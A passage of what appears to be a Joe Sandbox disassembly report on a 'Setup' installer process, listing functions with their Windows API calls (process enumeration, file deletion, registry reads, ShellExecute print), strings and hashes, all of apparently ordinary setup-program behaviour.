                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$FreeString$CommandCreateException@8FileH_prolog3_catchInitializeInstanceLineModuleNamePathRelativeThrow
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3727545618-0
                                                                                                                                                                    • Opcode ID: 076d694fc5fb5a844fb430abd385f8ad380c7dcb88d7d30ae7d9ff46578fcd20
                                                                                                                                                                    • Instruction ID: 55fdd0bb8696af52a633b98ea431359b30bc79fe58b8d07a06d21f59fe434fdf
                                                                                                                                                                    • Opcode Fuzzy Hash: 076d694fc5fb5a844fb430abd385f8ad380c7dcb88d7d30ae7d9ff46578fcd20
                                                                                                                                                                    • Instruction Fuzzy Hash: 4041277A80024DEFDF01EFE4CD44AEEBBB9AF05318F109165E510A7691CB349A158BB1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698E6655 Relevance: 7.6, APIs: 5, Instructions: 72windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 698E665C
                                                                                                                                                                      • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
                                                                                                                                                                      • Part of subcall function 698EF35E: __EH_prolog3.LIBCMT ref: 698EF365
                                                                                                                                                                      • Part of subcall function 698EF35E: __recalloc.LIBCMT ref: 698EF3A7
                                                                                                                                                                    • _memset.LIBCMT ref: 698E66C3
                                                                                                                                                                    • GetClientRect.USER32 ref: 698E66E6
                                                                                                                                                                    • SendMessageW.USER32(00000001,00000432,00000000,?), ref: 698E66FC
                                                                                                                                                                      • Part of subcall function 698F81DE: _memcpy_s.LIBCMT ref: 698F8224
                                                                                                                                                                    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,00000040,698E730F,?,?,?,?,?,?,?,?,?), ref: 698E6713
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$ClientExceptionH_prolog3_MessageRaiseRectSend__recalloc_memcpy_s_memset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4097222183-0
                                                                                                                                                                    • Opcode ID: 1e76aba9f9846bea87aa96bc08d5ce974ca84f9cd9e5bca524f6e329c67917a0
                                                                                                                                                                    • Instruction ID: d3a361e69651c8af87e2d7a3240bb1b121f1029adf7376d1a1f0a55680ae638e
                                                                                                                                                                    • Opcode Fuzzy Hash: 1e76aba9f9846bea87aa96bc08d5ce974ca84f9cd9e5bca524f6e329c67917a0
                                                                                                                                                                    • Instruction Fuzzy Hash: 6C217775800208EFCB24DFA8C898E9EBBB8FF45318F14850DF611AB290D731AA06CF50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DD0F64 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _malloc.LIBCMT ref: 69DD0F72
                                                                                                                                                                      • Part of subcall function 69DCBFB3: __FF_MSGBANNER.LIBCMT ref: 69DCBFCC
                                                                                                                                                                      • Part of subcall function 69DCBFB3: __NMSG_WRITE.LIBCMT ref: 69DCBFD3
                                                                                                                                                                      • Part of subcall function 69DCBFB3: RtlAllocateHeap.NTDLL(00000000,00000001,?,69DA831D,00000000,?,69DCC0C9,69DAF845,00000C00,00000020,69DAF845,?), ref: 69DCBFF8
                                                                                                                                                                    • _free.LIBCMT ref: 69DD0F85
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocateHeap_free_malloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1020059152-0
                                                                                                                                                                    • Opcode ID: 52bd6a224eb6b1a648a86305a1401c74534d9d9a9db99be3a0fd5d0dda47fba9
                                                                                                                                                                    • Instruction ID: 69c04c86c05ee2b34a7e804f925ee62df5a2323901a9a0d12f93b20aaaf1d6bf
                                                                                                                                                                    • Opcode Fuzzy Hash: 52bd6a224eb6b1a648a86305a1401c74534d9d9a9db99be3a0fd5d0dda47fba9
                                                                                                                                                                    • Instruction Fuzzy Hash: C311C436848255EBDB125B78E90564A3B98AF823E4B20D435F8599B980DF39C848C7F1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D95238 Relevance: 7.5, APIs: 5, Instructions: 49processCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 69D95254
                                                                                                                                                                    • _memset.LIBCMT ref: 69D9526E
                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 69D95288
                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 69D952A3
                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(00000000), ref: 69D952B7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32_memset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 949835396-0
                                                                                                                                                                    • Opcode ID: cc22abaa42eb4f4e75595eaf9b5ea6103538405633e72d5855daa1a99ed683e1
                                                                                                                                                                    • Instruction ID: 39e2709d54b2fd9c4f0a93f64a8fa4930ea023d8c087d821fc562f5a259933f8
                                                                                                                                                                    • Opcode Fuzzy Hash: cc22abaa42eb4f4e75595eaf9b5ea6103538405633e72d5855daa1a99ed683e1
                                                                                                                                                                    • Instruction Fuzzy Hash: 6F018C31911128EBDB10EBA5998DEAE77B8FB87311F4042B5E914D3280DB34EE45CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698F7BEC Relevance: 7.5, APIs: 5, Instructions: 37fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(?,00000000,?,698E0FC5,2F25BB2A), ref: 698F7BFB
                                                                                                                                                                    • DeleteFileW.KERNEL32(?,00000000,?,698E0FC5,2F25BB2A), ref: 698F7C0E
                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,00000000,?,698E0FC5,2F25BB2A), ref: 698F7C1E
                                                                                                                                                                    • GetLastError.KERNEL32(?,698E0FC5,2F25BB2A), ref: 698F7C28
                                                                                                                                                                    • MoveFileW.KERNEL32(?,00000000), ref: 698F7C41
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$Delete$ChangeCloseErrorFindLastMoveNotification
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 441735897-0
                                                                                                                                                                    • Opcode ID: 6cb6f78a66907ff9550a31aa34205c483b4af02c1460f58bd633a7cea0685b86
                                                                                                                                                                    • Instruction ID: 97ef6dcc2aad8a2799d1787cca019a6fa7ea77d4fcd15b814c139a32467fa317
                                                                                                                                                                    • Opcode Fuzzy Hash: 6cb6f78a66907ff9550a31aa34205c483b4af02c1460f58bd633a7cea0685b86
                                                                                                                                                                    • Instruction Fuzzy Hash: D1F05B316041549BEB116F64CD09B4A36A9EF233D6F006C39F949D1100D7708592CAE5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D82E48 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 253COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D82E4F
                                                                                                                                                                      • Part of subcall function 69DA9653: _free.LIBCMT ref: 69DA9698
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3_free
                                                                                                                                                                    • String ID: evaluated to false$ evaluated to true$BlockIf
                                                                                                                                                                    • API String ID: 2248394366-2909538125
                                                                                                                                                                    • Opcode ID: 6b420af697f3bcc0941b7a1fff9c44bb56f016af378e7b83effaac03a5dcf685
                                                                                                                                                                    • Instruction ID: 86d3c047af2ad9147c13c432e76b6014e1caf3e09c30f96e5494d33661ff630c
                                                                                                                                                                    • Opcode Fuzzy Hash: 6b420af697f3bcc0941b7a1fff9c44bb56f016af378e7b83effaac03a5dcf685
                                                                                                                                                                    • Instruction Fuzzy Hash: 01A17375900209DFCF10DFA8CA84ADEBBB5FF08318F1081A9E519AB751D731E916CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DA4513 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 251COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69DA45A2
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D78329: __EH_prolog3.LIBCMT ref: 69D78330
                                                                                                                                                                      • Part of subcall function 69D78129: SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,69D7AA3A,?,00000000,00000000,00000002,?,80000000,00000001,00000003), ref: 69D78149
                                                                                                                                                                    Strings
                                                                                                                                                                    • Cannot create file or delete file in Temp directory , xrefs: 69DA45C5
                                                                                                                                                                    • .htm, xrefs: 69DA4763
                                                                                                                                                                    • Cannot get valid temp folder, xrefs: 69DA456D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8FilePointerThrow
                                                                                                                                                                    • String ID: .htm$Cannot create file or delete file in Temp directory $Cannot get valid temp folder
                                                                                                                                                                    • API String ID: 1975055723-2150540039
                                                                                                                                                                    • Opcode ID: c9ef4824f6a4f39c2768c44edb502b19a942e59ef9e05bfe69d202e8501e9f14
                                                                                                                                                                    • Instruction ID: 74241c61c1fed91f6cbd389b9309910c83abefd8d45f04923f935a99dabf32ae
                                                                                                                                                                    • Opcode Fuzzy Hash: c9ef4824f6a4f39c2768c44edb502b19a942e59ef9e05bfe69d202e8501e9f14
                                                                                                                                                                    • Instruction Fuzzy Hash: F7A148750083849FD700DFA8C845B4EBBE9BF85328F008A2DF4A4D7A90DB74D9088B63
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D92E7C Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 192COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D92E83
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D92DBC: __EH_prolog3.LIBCMT ref: 69D92DC3
                                                                                                                                                                      • Part of subcall function 69DA91D4: __EH_prolog3.LIBCMT ref: 69DA91DB
                                                                                                                                                                      • Part of subcall function 69DA91D4: __recalloc.LIBCMT ref: 69DA921D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$__recalloc
                                                                                                                                                                    • String ID: No ProcessBlock element$ProcessBlock added$ProcessBlocks
                                                                                                                                                                    • API String ID: 1900422986-3251087430
                                                                                                                                                                    • Opcode ID: f30c14b28645ef7705ea8f89e0bf61821d5e7317187ae846c36e670595383f1c
                                                                                                                                                                    • Instruction ID: 95e64bb52d6c7318426ce5a131a8c95940cc1a188190ee1036f4b9cd52321b78
                                                                                                                                                                    • Opcode Fuzzy Hash: f30c14b28645ef7705ea8f89e0bf61821d5e7317187ae846c36e670595383f1c
                                                                                                                                                                    • Instruction Fuzzy Hash: B5715DB0A00249DFDF00DFA8C984AAEBBB5BF49308F548079E519EB791C7359E45CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D931C4 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 192COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D931CB
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D93104: __EH_prolog3.LIBCMT ref: 69D9310B
                                                                                                                                                                      • Part of subcall function 69DA91D4: __EH_prolog3.LIBCMT ref: 69DA91DB
                                                                                                                                                                      • Part of subcall function 69DA91D4: __recalloc.LIBCMT ref: 69DA921D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$__recalloc
                                                                                                                                                                    • String ID: No ServiceBlock element$ServiceBlock added$ServiceBlocks
                                                                                                                                                                    • API String ID: 1900422986-3373415214
                                                                                                                                                                    • Opcode ID: e0810c00a140672322a4b3d3f3ee6724936ef518dc6ac5ced4663d5a554df742
                                                                                                                                                                    • Instruction ID: a40e505c3a01ac054f04a4496bd09dbdb9dc5c473410308c0026d9280a761ce9
                                                                                                                                                                    • Opcode Fuzzy Hash: e0810c00a140672322a4b3d3f3ee6724936ef518dc6ac5ced4663d5a554df742
                                                                                                                                                                    • Instruction Fuzzy Hash: F3712FB0A0024ADFDF00DFE8C984AAEBBB5BF49308F548069E515EB791C7359E44CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DA72E4 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 69DA72EB
                                                                                                                                                                      • Part of subcall function 69D743C4: __EH_prolog3.LIBCMT ref: 69D743CB
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69DA8ED0: __EH_prolog3.LIBCMT ref: 69DA8ED7
                                                                                                                                                                      • Part of subcall function 69DA8ED0: PathFindExtensionW.SHLWAPI(?,00000004,69DA7362,?,?,?,00000000,?,?), ref: 69DA8F01
                                                                                                                                                                      • Part of subcall function 69DCC0AA: _malloc.LIBCMT ref: 69DCC0C4
                                                                                                                                                                      • Part of subcall function 69DA3B2B: __EH_prolog3.LIBCMT ref: 69DA3B32
                                                                                                                                                                      • Part of subcall function 69DA3B2B: InitializeCriticalSection.KERNEL32(00000002,?,00000000,00000000,00000002,?,?,00000000,?,?,?,?,00000008,69DAEC79,?,?), ref: 69DA3BC9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$CriticalExtensionFindH_prolog3_catchInitializePathSection_malloc
                                                                                                                                                                    • String ID: .htm$.html$.txt
                                                                                                                                                                    • API String ID: 2678321574-1806469533
                                                                                                                                                                    • Opcode ID: 493bc62813ef44c24256cd662e1f67c4e2f05e0a78c78c843c61fb881aab9450
                                                                                                                                                                    • Instruction ID: cc1c75ba86173acd6d45cea645658f62e61f3f461eabf2d371464354acde988a
                                                                                                                                                                    • Opcode Fuzzy Hash: 493bc62813ef44c24256cd662e1f67c4e2f05e0a78c78c843c61fb881aab9450
                                                                                                                                                                    • Instruction Fuzzy Hash: 4951B235D00249EEDF00CBB8C904B9E7BF9AF15318F109575E854EBA95DB748A14CB72
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698E1003 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 126COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
                                                                                                                                                                      • Part of subcall function 698F7ACF: GetTempPathW.KERNEL32(00000100,?,?,00000000), ref: 698F7AFC
                                                                                                                                                                      • Part of subcall function 698E0ECA: SendMessageW.USER32(00000000,0000044A,00000002,?), ref: 698E0F06
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,?,2F25BB2A), ref: 698E1126
                                                                                                                                                                    • ShellExecuteW.SHELL32(00000001,print,?,00000000,00000000,00000000), ref: 698E116E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Path$ExecuteExistsFileH_prolog3MessageSendShellTemp
                                                                                                                                                                    • String ID: %s\BlockersInfo%d.rtf$print
                                                                                                                                                                    • API String ID: 2742019059-575943144
                                                                                                                                                                    • Opcode ID: 21b1bb1bb5078e69f0940799ffeb928ba8e30a7a455ffb40f16c07f8c30791b7
                                                                                                                                                                    • Instruction ID: eee194f3293839ea7288463da59cf78cc7f8032342d93f09fa8d7997e66dfde3
                                                                                                                                                                    • Opcode Fuzzy Hash: 21b1bb1bb5078e69f0940799ffeb928ba8e30a7a455ffb40f16c07f8c30791b7
                                                                                                                                                                    • Instruction Fuzzy Hash: AB416C725082459FCB10DF69C844A5FBBE8FF89758F445E2DF098E3251D730DA1A8B62
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DAA622 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 111COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorH_prolog3Last
                                                                                                                                                                    • String ID: DW\DW20.exe$Failed to record SetupFlags
                                                                                                                                                                    • API String ID: 685212868-3543485478
                                                                                                                                                                    • Opcode ID: d9dee96a6706b01c16b92799651bedffccbec46332a8b2fcec2edbc91e917378
                                                                                                                                                                    • Instruction ID: 6aa062ef987526d7088ca16422dc241a5eb1041c6c6424380fd9ae56871a4aeb
                                                                                                                                                                    • Opcode Fuzzy Hash: d9dee96a6706b01c16b92799651bedffccbec46332a8b2fcec2edbc91e917378
                                                                                                                                                                    • Instruction Fuzzy Hash: 45417B79900149DFCB00DBB8C945AEEBBB9AF05328F148664E411EB791CB34DA058BB1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69A73E29 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(?,?,00000000,-00020018,00000000,80000002,CEIPEnable,00000002), ref: 69A73E94
                                                                                                                                                                    • RegQueryValueExW.KERNEL32(00000000,00000002,00000000,?,?,00000004), ref: 69A73EB0
